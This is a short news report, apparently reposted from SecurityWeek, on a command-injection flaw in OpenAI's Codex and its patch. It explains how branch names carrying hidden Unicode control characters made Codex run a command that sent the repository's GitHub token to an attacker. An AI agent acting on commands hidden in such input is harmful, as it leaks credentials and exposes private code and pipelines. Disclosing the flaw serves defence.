Critical Vulnerability in OpenAI Codex Allowed GitHub Token Compromise
openai
| Source: SecurityWeek | Original article
OpenAI’s Codex, the large‑language model that turns natural‑language prompts into runnable code, harboured a hidden command‑injection flaw that let attackers siphon GitHub authentication tokens. Security researchers uncovered an obfuscated token while probing the interaction between Codex and GitHub repositories, then traced the leak to maliciously crafted branch names that embedded Unicode control characters. When Codex processed such a branch name, it executed a hidden command that echoed the repository’s `GITHUB_TOKEN` back to the attacker’s server.
OpenAI moved quickly to patch the vulnerability, updating the cloud‑based Codex service and rolling out a dedicated “Codex Security Vulnerability Scanner” that has already examined 1.2 million recent commits, flagging nearly 800 critical issues. GitHub simultaneously released emergency fixes for three Enterprise Server bugs, including the one that allowed the token‑stealing injection to succeed.
The breach matters because Codex is embedded in a growing ecosystem of AI‑assisted development tools, from GitHub Copilot to third‑party IDE plugins. A compromised token grants read‑write access to private code, CI/CD pipelines, and any downstream services that rely on the token, opening a fast lane for supply‑chain sabotage or data exfiltration. Enterprises that have integrated Codex into internal tooling now face an urgent audit of access controls and token rotation policies.
What to watch next: OpenAI has pledged to expand its automated scanner to all Codex users and to publish detailed remediation guidelines. GitHub is expected to tighten its token‑handling APIs and may introduce stricter validation of branch names. Regulators in the EU and Nordic states are beginning to scrutinise AI‑driven code generation for systemic security risks, so policy proposals on mandatory security audits for AI coding assistants could surface before year‑end. Developers should monitor both OpenAI’s and GitHub’s advisories and rotate any tokens that may have been exposed.
Sources
Back to AIPULSEN